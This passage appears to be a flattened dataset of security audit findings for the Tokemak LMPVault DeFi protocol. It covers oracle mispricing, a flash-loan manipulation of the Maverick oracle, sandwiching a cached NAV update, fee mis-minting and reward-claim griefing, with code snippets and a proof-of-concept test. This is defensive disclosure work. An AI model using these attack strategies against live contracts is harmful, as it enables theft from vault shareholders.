This difference could be arbitraged or exploited by malicious users for their gain.\\nCertain actions such as `previewDeposit`, `previewMint`, `previewWithdraw,` and `previewRedeem` functions rely on the $totalAssets_{cached}$ value while other actions such as `_withdraw` and `_calcUserWithdrawSharesToBurn` functions rely on $totalAssets_{actual}$ value.\\nThe following shows one example of the issue.\\nThe `previewDeposit(assets)` function computed the number of shares to be received after depositing a specific amount of assets:\\n$$ shareReceived = \\frac{assets_{deposited}}{totalAssets_{cached}} \\times totalSupply $$\\nAssume that $totalAssets_{cached} < totalAssets_{actual}$, and the values of the variables are as follows:\\n$totalAssets_{cached}$ = 110 WETH\\n$totalAssets_{actual}$ = 115 WETH\\n$totalSupply$ = 100 shares\\nAssume Bob deposited 10 WETH when the total assets are 110 WETH (when $totalAssets_{cached} < totalAssets_{actual}$), he would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{110 ETH} \\times 100e18\\ shares \\ &= 9.090909091e18\\ shares \\end{align} $$\\nIf a user deposited 10 WETH while the total assets are updated to the actual worth of 115 WETH (when $totalAssets_{cached} == totalAssets_{actual}$, they would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{115 ETH} \\times 100e18\\ shares \\ &= 8.695652174e18\\ shares \\ \\end{align} $$\\nTherefore, Bob is receiving more shares than expected.\\nIf Bob redeems all his nine (9) shares after the $totalAssets_{cached}$ has been updated to $totalAssets_{actual}$, he will receive 10.417 WETH back.\\n$$ \\begin{align} assetsReceived &= \\frac{9.090909091e18\\ shares}{(100e18 + 9.090909091e18)\\ shares} \\times (115 + 10)\\ ETH \\ &= \\frac{9.090909091e18\\ shares}{109.090909091e18\\ shares} \\times 125 ETH \\ &= 10.41666667\\ ETH \\end{align} $$\\nBob profits 0.417 WETH simply by arbitraging the difference between the cached and actual values of the total assets. 
Bob gains is the loss of other vault shareholders.\\nThe $totalAssets_{cached}$ can be updated to $totalAssets_{actual}$ by calling the permissionless `LMPVault.updateDebtReporting` function. Alternatively, one could also perform a sandwich attack against the `LMPVault.updateDebtReporting` function by front-run it to take advantage of the lower-than-expected price or NAV/share, and back-run it to sell the shares when the price or NAV/share rises after the update.\\nOne could also reverse the attack order, where an attacker withdraws at a higher-than-expected price or NAV/share, perform an update on the total assets, and deposit at a lower price or NAV/share.чConsider updating $totalAssets_{cached}$ to $totalAssets_{actual}$ before any withdrawal or deposit to mitigate this issue.чLoss assets for vault shareholders. Attacker gains are the loss of other vault shareholders.ч```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n -Incorrect pricing for CurveV2 LP TokenчhighчUsing the Curve rETH/frxETH pool (0xe7c6e0a739021cdba7aac21b4b728779eef974d9) to illustrate the issue:\\nThe price of the LP token of Curve rETH/frxETH pool can be obtained via the following `lp_price` function:\\n```\\ndef lp_price() -> uint256:\\n \"\"\"\\n Approximate LP token price\\n \"\"\"\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n\\nThus, the formula to obtain the price of the LP token is as follows:\\n$$ price_{LP} = 2 \\times virtualPrice \\times \\sqrt{internalPriceOracle} $$\\n```\\ndef price_oracle() -> uint256:\\n return self.internal_price_oracle()\\n```\\n\\nThe $internalPriceOracle$ is the price of coins[1](frxETH) with coins[0](rETH) as the quote currency, which means how many rETH (quote) are needed to purchase one frxETH (base).\\n$$ base/quote \\ frxETH/rETH $$\\nDuring pool registration, the `poolInfo.tokenToPrice` is always set to the second 
coin (coins[1]) as per Line 131 below. In this example, `poolInfo.tokenToPrice` will be set to frxETH token address (coins[1]).\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function registerPool(address curvePool, address curveLpToken, bool checkReentrancy) external onlyOwner {\\n..SNIP..\\n /**\\n * Curve V2 pools always price second token in `coins` array in first token in `coins` array. This means that\\n * if `coins[0]` is Weth, and `coins[1]` is rEth, the price will be rEth as base and weth as quote. Hence\\n * to get lp price we will always want to use the second token in the array, priced in eth.\\n */\\n lpTokenToPool[lpToken] =\\n PoolData({ pool: curvePool, checkReentrancy: checkReentrancy ? 1 : 0, tokenToPrice: tokens[1] });\\n```\\n\\nNote that `assetPrice` variable below is equivalent to $internalPriceOracle$ in the above formula.\\nWhen fetching the price of the LP token, Line 166 computes the price of frxETH with ETH as the quote currency ($frxETH/ETH$) via the `getPriceInEth` function, and assigns to the `assetPrice` variable.\\nHowever, the $internalPriceOracle$ or `assetPrice` should be $frxETH/rETH$ instead of $frxETH/ETH$. 
Thus, the price of the LP token computed will be incorrect.\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function getPriceInEth(address token) external returns (uint256 price) {\\n Errors.verifyNotZero(token, \"token\");\\n\\n PoolData memory poolInfo = lpTokenToPool[token];\\n if (poolInfo.pool == address(0)) revert NotRegistered(token);\\n\\n ICryptoSwapPool cryptoPool = ICryptoSwapPool(poolInfo.pool);\\n\\n // Checking for read only reentrancy scenario.\\n if (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n }\\n\\n uint256 virtualPrice = cryptoPool.get_virtual_price();\\n uint256 assetPrice = systemRegistry.rootPriceOracle().getPriceInEth(poolInfo.tokenToPrice);\\n\\n return (2 * virtualPrice * sqrt(assetPrice)) / 10 ** 18;\\n }\\n```\\nчIssue Incorrect pricing for CurveV2 LP Token\\nUpdate the `getPriceInEth` function to ensure that the $internalPriceOracle$ or `assetPrice` return the price of `coins[1]` with `coins[0]` as the quote currency.чThe protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing of LP tokens would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.ч```\\ndef lp_price() -> uint256:\\n \"\"\"\\n Approximate LP token price\\n \"\"\"\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n -Incorrect number of shares minted as feeчhighч```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if 
(fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n\\nAssume that the following states:\\nThe `profit` is 100 WETH\\nThe fee is 20%, so the `fees` will be 20 WETH.\\n`totalSupply` is 100 shares and `totalAssets()` is 1000 WETH\\nLet the number of shares to be minted be $shares2mint$. The current implementation uses the following formula (simplified) to determine $shares2mint$.\\n$$ \\begin{align} shares2mint &= fees \\times \\frac{totalSupply}{totalAsset()} \\ &= 20\\ WETH \\times \\frac{100\\ shares}{1000\\ WETH} \\ &= 2\\ shares \\end{align} $$\\nIn this case, two (2) shares will be minted to the `sink` address as the fee is taken.\\nHowever, the above formula used in the codebase is incorrect. The total cost/value of the newly-minted shares does not correspond to the fee taken. Immediately after the mint, the value of the two (2) shares is worth only 19.60 WETH, which does not correspond to the 20 WETH fee that the `sink` address is entitled to.\\n$$ \\begin{align} value &= 2\\ shares \\times \\frac{1000\\ WETH}{100 + 2\\ shares} \\ &= 2\\ shares \\times 9.8039\\ WETH\\ &= 19.6078\\ WETH \\end{align} $$чThe correct formula to compute the number of shares minted as fee should be as follows:\\n$$ \\begin{align} shares2mint &= \\frac{profit \\times performanceFeeBps \\times totalSupply}{(totalAsset() \\times MAX_FEE_BPS) - (performanceFeeBps \\times profit) } \\ &= \\frac{100\\epsilon \\times 2000 \\times 100 shares}{(1000\\epsilon \\times 10000) - (2000 \\times 100\\epsilon)} \\ &= 2.0408163265306122448979591836735\\ shares \\end{align} $$\\nThe following is the proof to show that `2.0408163265306122448979591836735` shares are worth 20 WETH after the mint.\\n$$ \\begin{align} value &= 2.0408163265306122448979591836735\\ shares \\times \\frac{1000\\ WETH}{100 + 
2.0408163265306122448979591836735\\ shares} \\ &= 2.0408163265306122448979591836735\\ shares \\times 9.8039\\ WETH\\ &= 20\\ WETH \\end{align} $$чLoss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.ч```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n -Maverick oracle can be manipulatedчhighчIn the MavEthOracle contract, `getPriceInEth` function utilizes the reserves of the Maverick pool and multiplies them with the external prices of the tokens (obtained from the rootPriceOracle contract) to calculate the total value of the Maverick position.\\n```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n\\nHowever, the reserves of a Maverick position can fluctuate when the 
price of the Maverick pool changes. Therefore, the returned price of this function can be manipulated by swapping a significant amount of tokens into the Maverick pool. An attacker can utilize a flash loan to initiate a swap, thereby changing the price either upwards or downwards, and subsequently swapping back to repay the flash loan.\\nAttacker can decrease the returned price of MavEthOracle by swapping a large amount of the higher value token for the lower value token, and vice versa.\\nHere is a test file that demonstrates how the price of the MavEthOracle contract can be manipulated by swapping to change the reserves.чUse another calculation for Maverick oracleчThere are multiple impacts that an attacker can exploit by manipulating the price of MavEthOracle:\\nDecreasing the oracle price to lower the totalDebt of LMPVault, in order to receive more LMPVault shares.\\nIncreasing the oracle price to raise the totalDebt of LMPVault, in order to receive more withdrawn tokens.\\nManipulating the results of the Stats contracts to cause miscalculations for the protocol.ч```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n 
-Aura/Convex rewards are stuck after DOSчhighчAnyone can claim Convex rewards for any account.\\n```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n\\nIn ConvexRewardsAdapter, the rewards are accounted for by using balanceBefore/after.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n\\n uint256[] memory balancesBefore = new uint256[](totalLength);\\n uint256[] memory amountsClaimed = new uint256[](totalLength);\\n// rest of code\\n\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for \"stash tokens\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n return (amountsClaimed, rewardTokens);\\n```\\n\\nAdversary can call the external convex contract's `getReward(tokemakContract)`. After this, the reward tokens are transferred to Tokemak without an accounting hook.\\nNow, when Tokemak calls claimRewards, then no new rewards are transferred, because the attacker already transferred them. `amountsClaimed` will be 0.чDon't use balanceBefore/After. You could consider using `balanceOf(address(this))` after claiming to see the full amount of tokens in the contract. 
This assumes that only the specific rewards balance is in the contract.чRewards are stuck in the LiquidationRow contract and not queued to the MainRewarder.ч```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n -`LMPVault._withdraw()` can revert due to an arithmetic underflowчmediumчInside the `_withdraw()` function, the `maxAssetsToPull` argument value of `_calcUserWithdrawSharesToBurn()` is calculated to be equal to `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)`. However, the `_withdraw()` function only halts its loop when `info.totalAssetsPulled >= info.totalAssetsToPull`. This can lead to a situation where `info.debtDecrease >= info.totalAssetsToPull`. 
Consequently, when calculating `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)` for the next destination vault in the loop, an underflow occurs and triggers a contract revert.\\nTo illustrate this vulnerability, consider the following scenario:\\n```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n 
}\\n```\\nчIssue `LMPVault._withdraw()` can revert due to an arithmetic underflow\\nTo mitigate this vulnerability, it is recommended to break the loop within the `_withdraw()` function if `Math.max(info.debtDecrease, info.totalAssetsPulled) >= info.totalAssetsToPull`\\n```\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) >\\n info.totalAssetsToPull\\n ) {\\n info.idleIncrease =\\n Math.max(info.debtDecrease, info.totalAssetsPulled) -\\n info.totalAssetsToPull;\\n if (info.totalAssetsPulled >= info.debtDecrease) {\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n }\\n break;\\n }\\n\\n // No need to keep going if we have the amount we're looking for\\n // Any overage is accounted for above. Anything lower and we need to keep going\\n // slither-disable-next-line incorrect-equality\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) ==\\n info.totalAssetsToPull\\n ) {\\n break;\\n }\\n```\\nчThe vulnerability can result in the contract reverting due to an underflow, disrupting the functionality of the contract. 
Users who try to withdraw assets from the LMPVault may encounter transaction failures and be unable to withdraw their assets.ч```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n -Unable to withdraw extra rewardsчmediumчSuppose Bob only has 9999 Wei TOKE tokens as main rewards and 100e18 DAI as extra rewards in this 
account.\\nWhen attempting to get the rewards, the code will always get the main rewards, followed by the extra rewards, as shown below.\\n```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n\\nIf the main reward is TOKE, they will be staked to the `GPToke` at Line 376 below.\\n```\\nFile: AbstractRewarder.sol\\n function _getReward(address account) internal {\\n Errors.verifyNotZero(account, \"account\");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither-disable-next-line incorrect-equality\\n if (reward == 0) return;\\n\\n rewards[account] = 0;\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n // authorize gpToke to get our reward Toke\\n // slither-disable-next-line unused-return\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n }\\n }\\n```\\n\\nHowever, if the staked amount is less than the minimum stake amount (MIN_STAKE_AMOUNT), the function will revert.\\n```\\nFile: GPToke.sol\\n uint256 public constant MIN_STAKE_AMOUNT = 10_000;\\n..SNIP..\\n function _stake(uint256 amount, uint256 duration, address to) internal whenNotPaused {\\n //\\n // validation checks\\n //\\n if (to == address(0)) revert ZeroAddress();\\n if (amount < MIN_STAKE_AMOUNT) revert StakingAmountInsufficient();\\n if (amount > MAX_STAKE_AMOUNT) revert StakingAmountExceeded();\\n```\\n\\nIn this case, Bob will not be able 
to redeem his 100 DAI reward when processing the reward. The code will always attempt to stake 9999 Wei Toke and revert because it fails to meet the minimum stake amount.чTo remediate the issue, consider collecting TOKE and staking it to the `GPToke` contract only if it meets the minimum stake amount.\\n```\\nfunction _getReward(address account) internal {\\n Errors.verifyNotZero(account, \"account\");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline incorrect// Remove the line below\\nequality\\n if (reward == 0) return;\\n\\n// Remove the line below\\n rewards[account] = 0;\\n// Remove the line below\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n// Add the line below\\n if (reward >= MIN_STAKE_AMOUNT) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n// Add the line below\\n\\n // authorize gpToke to get our reward Toke\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline unused// Remove the line below\\nreturn\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n// Add the line below\\n }\\n }\\n}\\n```\\nчThere is no guarantee that the users' TOKE rewards will always be larger than `MIN_STAKE_AMOUNT` as it depends on various factors such as the following:\\nThe number of vault shares they hold. 
If they hold little shares, their TOKE reward will be insignificant\\nIf their holding in the vault is small compared to the others and the entire vault, the TOKE reward they received will be insignificant\\nThe timing they join the vault. If they join after the reward is distributed, they will not be entitled to it.\\nAs such, the affected users will not be able to withdraw their extra rewards, and they will be stuck in the contract.ч```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n -Malicious or compromised admin of certain LSTs could manipulate the priceчmediumчImportant Per the contest detail page, admins of the external protocols are marked as \"Restricted\" (Not Trusted). This means that any potential issues arising from the external protocol's admin actions (maliciously or accidentally) are considered valid in the context of this audit.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED?\\nRESTRICTED\\nNote This issue also applies to other support Liquid Staking Tokens (LSTs) where the admin could upgrade the token contract code. Those examples are omitted for brevity, as the write-up and mitigation are the same and would duplicate this issue.\\nPer the contest detail page, the protocol will hold and interact with the Swell ETH (swETH).\\nLiquid Staking Tokens\\nswETH: 0xf951E335afb289353dc249e82926178EaC7DEd78\\nUpon inspection of the swETH on-chain contract, it was found that it is a Transparent Upgradeable Proxy. This means that the admin of Swell protocol could upgrade the contracts.\\nTokemak relies on the `swEth.swETHToETHRate()` function to determine the price of the swETH LST within the protocol. 
Thus, a malicious or compromised admin of Swell could upgrade the contract to have the `swETHToETHRate` function return an extremely high value to manipulate the total values of the vaults, resulting in users being able to withdraw more assets than expected, thus draining the LMPVault.\\n```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\nчThe protocol team should be aware of the above-mentioned risks and consider implementing additional controls to reduce the risks.\\nReview each of the supported LSTs and determine how much power the Liquid staking protocol team/admin has over its tokens.\\nFor LSTs that are more centralized (e.g., Liquid staking protocol team could update the token contracts or have the ability to update the exchange rate/price to an arbitrary value without any limit), those LSTs should be subjected to additional controls or monitoring, such as implementing some form of circuit breakers if the price deviates beyond a reasonable percentage to reduce the negative impact to Tokemak if it happens.чLoss of assets in the scenario as described above.ч```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n -`previewRedeem` and `redeem` functions deviate from the ERC4626 specificationчmediumчImportant The contest page explicitly mentioned that the `LMPVault` must conform with the ERC4626. Thus, issues related to EIP compliance should be considered valid in the context of this audit.\\nQ: Is the code/contract expected to comply with any EIPs? 
Are there specific assumptions around adhering to those EIPs that Watsons should be aware of?\\nsrc/vault/LMPVault.sol should be 4626 compatible\\nLet the value returned by `previewRedeem` function be $asset_{preview}$ and the actual number of assets obtained from calling the `redeem` function be $asset_{actual}$.\\nThe following specification of `previewRedeem` function is taken from ERC4626 specification:\\nAllows an on-chain or off-chain user to simulate the effects of their redeemption at the current block, given current on-chain conditions.\\nMUST return as close to and no more than the exact amount of `assets` that would be withdrawn in a `redeem` call in the same transaction. I.e. `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction.\\nIt mentioned that the `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction, which means that it must always be $asset_{preview} \\le asset_{actual}$.\\nHowever, it is possible that the `redeem` function might return fewer assets than the number of assets previewed by the `previewRedeem` ($asset_{preview} > asset_{actual}$), thus it does not conform to the specification.\\n```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n\\nNote that the `previewRedeem` function performs its computation based on the cached `totalDebt` and `totalIdle`, which might not have been updated to reflect the actual on-chain market condition. 
Thus, these cached values might be higher than expected.\\nAssume that `totalIdle` is zero and all WETH has been invested in the destination vaults. Thus, `totalAssetsToPull` will be set to $asset_{preview}$.\\nIf a DV is making a loss, users could only burn an amount proportional to their ownership of this vault. The code will go through all the DVs in the withdrawal queue (withdrawalQueueLength) in an attempt to withdraw as many assets as possible. However, it is possible that the `totalAssetsPulled` to be less than $asset_{preview}$.\\n```\\nFile: LMPVault.sol\\n function _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n ) internal virtual returns (uint256) {\\n uint256 idle = totalIdle;\\n WithdrawInfo memory info = WithdrawInfo({\\n currentIdle: idle,\\n assetsFromIdle: assets >= idle ? idle : assets,\\n totalAssetsToPull: assets - (assets >= idle ? idle : assets),\\n totalAssetsPulled: 0,\\n idleIncrease: 0,\\n debtDecrease: 0\\n });\\n\\n // If not enough funds in idle, then pull what we need from destinations\\n if (info.totalAssetsToPull > 0) {\\n uint256 totalVaultShares = totalSupply();\\n\\n // Using pre-set withdrawalQueue for withdrawal order to help minimize user gas\\n uint256 withdrawalQueueLength = withdrawalQueue.length;\\n for (uint256 i = 0; i < withdrawalQueueLength; ++i) {\\n IDestinationVault destVault = IDestinationVault(withdrawalQueue[i]);\\n (uint256 sharesToBurn, uint256 totalDebtBurn) = _calcUserWithdrawSharesToBurn(\\n destVault,\\n shares,\\n info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled),\\n totalVaultShares\\n );\\n..SNIP..\\n // At this point should have all the funds we need sitting in in the vault\\n uint256 returnedAssets = info.assetsFromIdle + info.totalAssetsPulled;\\n```\\nчEnsure that $asset_{preview} \\le asset_{actual}$.\\nAlternatively, document that the `previewRedeem` and `redeem` functions deviate from the ERC4626 specification in the comments 
and/or documentation.чIt was understood from the protocol team that they anticipate external parties to integrate directly with the LMPVault (e.g., vault shares as collateral). Thus, the LMPVault must be ERC4626 compliance. Otherwise, the caller (internal or external) of the `previewRedeem` function might receive incorrect information, leading to the wrong action being executed.ч```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n -Malicious users could lock in the NAV/Share of the DV to cause the loss of feesчmediumчThe `_collectFees` function only collects fees whenever the NAV/Share exceeds the last NAV/Share.\\nDuring initialization, the `navPerShareHighMark` is set to `1`, effectively `1` ETH per share (1:1 ratio). Assume the following:\\nIt is at the early stage, and only a few shares (0.5 shares) were minted in the LMPVault\\nThere is a sudden increase in the price of an LP token in a certain DV 